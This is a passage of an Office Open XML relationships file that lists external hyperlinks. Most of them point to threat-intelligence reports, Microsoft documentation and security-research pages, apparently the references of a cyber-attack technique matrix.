Target="https://github.com/byt3bl33d3r/SILENTTRINITY/tree/master/silenttrinity/core/teamserver/modules/boo" TargetMode="External"/><Relationship Id="rId1580" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/ms682425" TargetMode="External"/><Relationship Id="rId1678" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/win32/wmisdk/managed-object-format--mof-" TargetMode="External"/><Relationship Id="rId1885" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://undocumented.ntinternals.net/" TargetMode="External"/><Relationship Id="rId2424" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.symantec.com/security_response/writeup.jsp?docid=2012-061518-4639-99" TargetMode="External"/><Relationship Id="rId2631" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html" TargetMode="External"/><Relationship Id="rId2729" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.us-cert.gov/ncas/alerts/AA18-337A" TargetMode="External"/><Relationship Id="rId2936" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/" TargetMode="External"/><Relationship Id="rId603" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html" TargetMode="External"/><Relationship Id="rId810" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html" TargetMode="External"/><Relationship Id="rId908" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html" TargetMode="External"/><Relationship Id="rId1233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/files/2016/07/The-ProjectSauron-APT_Technical_Analysis_KL.pdf" TargetMode="External"/><Relationship Id="rId1440" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mandiant.com/resources/apt41-initiates-global-intrusion-campaign-using-multiple-exploits" TargetMode="External"/><Relationship Id="rId1538" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/desktop/etw/consuming-events" TargetMode="External"/><Relationship Id="rId1300" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://lolbas-project.github.io/lolbas/Binaries/Msiexec/" TargetMode="External"/><Relationship Id="rId1745" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete" TargetMode="External"/><Relationship Id="rId1952" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Onion_routing" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cybersecurity.att.com/blogs/labs-research/the-rise-of-qakbot" TargetMode="External"/><Relationship Id="rId1605" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RWxPuf" TargetMode="External"/><Relationship Id="rId1812" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/win32/api/" TargetMode="External"/><Relationship Id="rId3058" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sentinelone.com/labs/apt32-multi-stage-macos-trojan-innovates-on-crimeware-scripting-technique/" TargetMode="External"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://o365blog.com/post/just-looking" TargetMode="External"/><Relationship Id="rId393" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf" TargetMode="External"/><Relationship Id="rId2074" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://windowsitpro.com/systems-management/psexec" TargetMode="External"/><Relationship Id="rId2281" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.secureworks.com/research/iron-twilight-supports-active-measures" TargetMode="External"/><Relationship Id="rId253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident" TargetMode="External"/><Relationship Id="rId460" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-april-stardust-chollima/" TargetMode="External"/><Relationship Id="rId698" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/" TargetMode="External"/><Relationship Id="rId1090" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.group-ib.com/blog/cobalt" TargetMode="External"/><Relationship Id="rId2141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.apple.com/en-us/HT209161" TargetMode="External"/><Relationship Id="rId2379" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf" TargetMode="External"/><Relationship Id="rId2586" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://threatpost.com/sharpshooter-complexity-scope/142359/" TargetMode="External"/><Relationship Id="rId2793" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://researchcenter.paloaltonetworks.com/2018/11/unit42-new-wine-old-bottle-new-azorult-variant-found-findmyname-campaign-using-fallout-exploit-kit/" TargetMode="External"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.anomali.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop" TargetMode="External"/><Relationship Id="rId320" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mdsec.co.uk/2017/07/categorisation-is-not-a-security-boundary/" TargetMode="External"/><Relationship Id="rId558" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dnsdumpster.com/" TargetMode="External"/><Relationship Id="rId765" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/Evi1cg/status/935027922397573120" TargetMode="External"/><Relationship Id="rId972" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gtfobins.github.io/gtfobins/at/" TargetMode="External"/><Relationship Id="rId1188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.joesecurity.org/blog/3660886847485093803" TargetMode="External"/><Relationship Id="rId1395" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html" TargetMode="External"/><Relationship Id="rId2001" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://researchcenter.paloaltonetworks.com/2016/02/t9000-advanced-modular-backdoor-uses-complex-anti-analysis-techniques/" TargetMode="External"/><Relationship Id="rId2239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/" TargetMode="External"/><Relationship Id="rId2446" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" TargetMode="External"/><Relationship Id="rId2653" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/PE_URSNIF.A2?_ga=2.131425807.1462021705.1559742358-1202584019.1549394279" TargetMode="External"/><Relationship Id="rId2860" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Binary-to-text_encoding" TargetMode="External"/><Relationship Id="rId418" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cofense.com/seeing-resurgence-demonic-astaroth-wmic-trojan/" TargetMode="External"/><Relationship Id="rId625" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.docker.com/engine/security/protect-access/" TargetMode="External"/><Relationship Id="rId832" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://content.fireeye.com/apt-41/rpt-apt41" TargetMode="External"/><Relationship Id="rId1048" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DiabloHorn/mempdump" TargetMode="External"/><Relationship Id="rId1255" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://patchwork.kernel.org/patch/8754821/" TargetMode="External"/><Relationship Id="rId1462" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securingtomorrow.mcafee.com/mcafee-labs/apt28-threat-group-adopts-dde-technique-nyc-attack-theme-in-latest-campaign/" TargetMode="External"/><Relationship Id="rId2306" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sentinelone.com/labs/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/" TargetMode="External"/><Relationship Id="rId2513" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/library/ee791851.aspx" TargetMode="External"/><Relationship Id="rId2958" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html" TargetMode="External"/><Relationship Id="rId1115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://lists.openstack.org/pipermail/openstack/2013-December/004138.html" TargetMode="External"/><Relationship Id="rId1322" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/" TargetMode="External"/><Relationship Id="rId1767" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2" TargetMode="External"/><Relationship Id="rId1974" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf" TargetMode="External"/><Relationship Id="rId2720" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf" TargetMode="External"/><Relationship Id="rId2818" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://devblogs.microsoft.com/vbteam/visual-basic-support-planned-for-net-5-0/" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/IAM/latest/UserGuide/cloudtrail-integration.html" TargetMode="External"/><Relationship Id="rId1627" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/bb166549.aspx" TargetMode="External"/><Relationship Id="rId1834" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-2017" TargetMode="External"/><Relationship Id="rId2096" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf" TargetMode="External"/><Relationship Id="rId1901" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.netskope.com/blog/a-big-catch-cloud-phishing-from-google-app-engine-and-azure-app-service" TargetMode="External"/><Relationship Id="rId275" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://us-cert.cisa.gov/ncas/alerts/aa21-048a" TargetMode="External"/><Relationship Id="rId482" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-zip-based-campaign/" TargetMode="External"/><Relationship Id="rId2163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://therecord.media/russian-hackers-bypass-2fa-by-annoying-victims-with-repeated-push-notifications/" TargetMode="External"/><Relationship Id="rId2370" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://staaldraad.github.io/2017/08/02/o356-phishing-with-oauth/" TargetMode="External"/><Relationship Id="rId3007" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://powershellmagazine.com/2014/07/16/investigating-powershell-attacks/" TargetMode="External"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/documentation/security/hardened_runtime" TargetMode="External"/><Relationship Id="rId342" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html" TargetMode="External"/><Relationship Id="rId787" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ic3.gov/Media/News/2022/220120.pdf" TargetMode="External"/><Relationship Id="rId994" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/iadgov/Secure-Host-Baseline/blob/master/Windows/Group%20Policy%20Templates/en-US/SecGuide.adml" TargetMode="External"/><Relationship Id="rId2023" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linuxhint.com/list-usb-devices-linux/" TargetMode="External"/><Relationship Id="rId2230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/darkvishnya/89169/" TargetMode="External"/><Relationship Id="rId2468" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.freedesktop.org/software/systemd/man/systemd.service.html" TargetMode="External"/><Relationship Id="rId2675" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.com/en_us/research/20/g/updates-on-quickly-evolving-thiefquest-macos-malware.html" TargetMode="External"/><Relationship Id="rId2882" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Unified_Extensible_Firmware_Interface" TargetMode="External"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/daniel-grzelak/backdooring-an-aws-account-da007d36f8f9" TargetMode="External"/><Relationship Id="rId647" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dragos.com/resource/xenotime/" TargetMode="External"/><Relationship Id="rId854" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2014/11/fin4_stealing_insid.html" TargetMode="External"/><Relationship Id="rId1277" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.kroll.com/en/insights/publications/malware-analysis-report-rawpos-malware" TargetMode="External"/><Relationship Id="rId1484" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf" TargetMode="External"/><Relationship Id="rId1691" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/library/cc237008.aspx" TargetMode="External"/><Relationship Id="rId2328" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://silentbreaksecurity.com/powershell-jobs-without-powershell-exe/" TargetMode="External"/><Relationship Id="rId2535" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.technet.microsoft.com/srd/2017/08/09/moving-beyond-emet-ii-windows-defender-exploit-guard/" TargetMode="External"/><Relationship Id="rId2742" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged" TargetMode="External"/><Relationship Id="rId507" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite" TargetMode="External"/><Relationship Id="rId714" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf" TargetMode="External"/><Relationship Id="rId921" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf" TargetMode="External"/><Relationship Id="rId1137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/" TargetMode="External"/><Relationship Id="rId1344" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://lockboxx.blogspot.com/2019/07/macos-red-teaming-206-ard-apple-remote.html" TargetMode="External"/><Relationship Id="rId1551" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/dd941614(v=ws.10)" TargetMode="External"/><Relationship Id="rId1789" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/library/cc755321.aspx" TargetMode="External"/><Relationship Id="rId1996" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/" TargetMode="External"/><Relationship Id="rId2602" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://documents.trendmicro.com/assets/white_papers/wp-a-deep-dive-into-defacement.pdf" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/IAM/latest/APIReference/API_GetAccountPasswordPolicy.html" TargetMode="External"/><Relationship Id="rId1204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07195002/KL_AdwindPublicReport_2016.pdf" TargetMode="External"/><Relationship Id="rId1411" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.malwaretech.com/2014/11/virtual-file-systems-for-beginners.html" TargetMode="External"/><Relationship Id="rId1649" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx" TargetMode="External"/><Relationship Id="rId1856" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/" TargetMode="External"/><Relationship Id="rId2907" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/skalkoto/winexe/" TargetMode="External"/><Relationship Id="rId3071" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://arxiv.org/abs/1809.05681" TargetMode="External"/><Relationship Id="rId1509" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf" TargetMode="External"/><Relationship Id="rId1716" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc961961(v=technet.10)?redirectedfrom=MSDN" TargetMode="External"/><Relationship Id="rId1923" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.opm.gov/cybersecurity/cybersecurity-incidents/" TargetMode="External"/><Relationship Id="rId297" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.christophetd.fr/building-an-office-macro-to-spoof-process-parent-and-command-line/" TargetMode="External"/><Relationship Id="rId2185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://socprime.com/blog/rule-of-the-week-possible-malicious-file-double-extension/" TargetMode="External"/><Relationship Id="rId2392" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.symantec.com/security_response/writeup.jsp?docid=2015-120123-5521-99" TargetMode="External"/><Relationship Id="rId3029" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mozilla.org/en-US/security/advisories/mfsa2012-98/" TargetMode="External"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/" TargetMode="External"/><Relationship Id="rId364" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tools.cisco.com/security/center/resources/integrity_assurance.html" TargetMode="External"/><Relationship Id="rId2045" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://shared-public-reports.s3-eu-west-1.amazonaws.com/APT27+turns+to+ransomware.pdf" TargetMode="External"/><Relationship Id="rId2697" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/ItsReallyNick/status/944321013084573697" TargetMode="External"/><Relationship Id="rId571" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.darkreading.com/attacks-breaches/chinese-hacking-group-codoso-team-uses-forbescom-as-watering-hole-/d/d-id/1319059" TargetMode="External"/><Relationship Id="rId669" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf" TargetMode="External"/><Relationship Id="rId876" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/" TargetMode="External"/><Relationship Id="rId1299" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://lolbas-project.github.io/lolbas/Binaries/Mshta/" TargetMode="External"/><Relationship Id="rId2252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/transparent-tribe-part-1/98127/" TargetMode="External"/><Relationship Id="rId2557" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/library/cc772408.aspx" TargetMode="External"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bitdefender.com/files/News/CaseStudies/study/399/Bitdefender-PR-Whitepaper-Trickbot-creat5515-en-EN.pdf" TargetMode="External"/><Relationship Id="rId431" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen?view=netframework-4.8" TargetMode="External"/><Relationship Id="rId529" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200302085133/https:/www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" TargetMode="External"/><Relationship Id="rId736" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Genetic-Malware/Ebowla/blob/master/Eko_2016_Morrow_Pitts_Master.pdf" TargetMode="External"/><Relationship Id="rId1061" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/grd-settings.c" TargetMode="External"/><Relationship Id="rId1159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.intego.com/mac-security-blog/osxshlayer-new-mac-malware-comes-out-of-its-shell/" TargetMode="External"/><Relationship Id="rId1366" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010" TargetMode="External"/><Relationship Id="rId2112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/" TargetMode="External"/><Relationship Id="rId2417" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.symantec.com/security_response/writeup.jsp?docid=2010-011114-1830-99" TargetMode="External"/><Relationship Id="rId2764" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/" TargetMode="External"/><Relationship Id="rId2971" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cyber.dhs.gov/assets/report/ar-16-20173.pdf" TargetMode="External"/><Relationship Id="rId943" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fortinet.com/blog/threat-research/trickbot-s-new-reconnaissance-plugin.html" TargetMode="External"/><Relationship Id="rId1019" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/quasar/QuasarRAT" TargetMode="External"/><Relationship Id="rId1573" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/powershell/module/microsoft.powershell.management/clear-eventlog" TargetMode="External"/><Relationship Id="rId1780" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows-hardware/drivers/install/the-testsigning-boot-configuration-option" TargetMode="External"/><Relationship Id="rId1878" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nsacyber/Mitigating-Web-Shells" TargetMode="External"/><Relationship Id="rId2624" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australia" TargetMode="External"/><Relationship Id="rId2831" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/en/faq/" TargetMode="External"/><Relationship Id="rId2929" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/madler/zlib" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://adsecurity.org/?p=2293" TargetMode="External"/><Relationship Id="rId803" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/security/blog/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/" TargetMode="External"/><Relationship Id="rId1226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://vblocalhost.com/uploads/VB2021-Kayal-etal.pdf" TargetMode="External"/><Relationship Id="rId1433" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.malwarebytes.com/cybercrime/2013/10/hiding-in-plain-sight/" TargetMode="External"/><Relationship Id="rId1640" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectory.domain.getalltrustrelationships?redirectedfrom=MSDN&amp;view=netframework-4.7.2" TargetMode="External"/><Relationship Id="rId1738" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/windows/device-security/security-policy-settings/replace-a-process-level-token" TargetMode="External"/><Relationship Id="rId3093" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://forensicswiki.xyz/wiki/index.php?title=Windows_XML_Event_Log_(EVTX)" TargetMode="External"/><Relationship Id="rId1500" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b" TargetMode="External"/><Relationship Id="rId1945" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/" TargetMode="External"/><Relationship Id="rId1805" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-architecture" TargetMode="External"/><Relationship Id="rId3020" 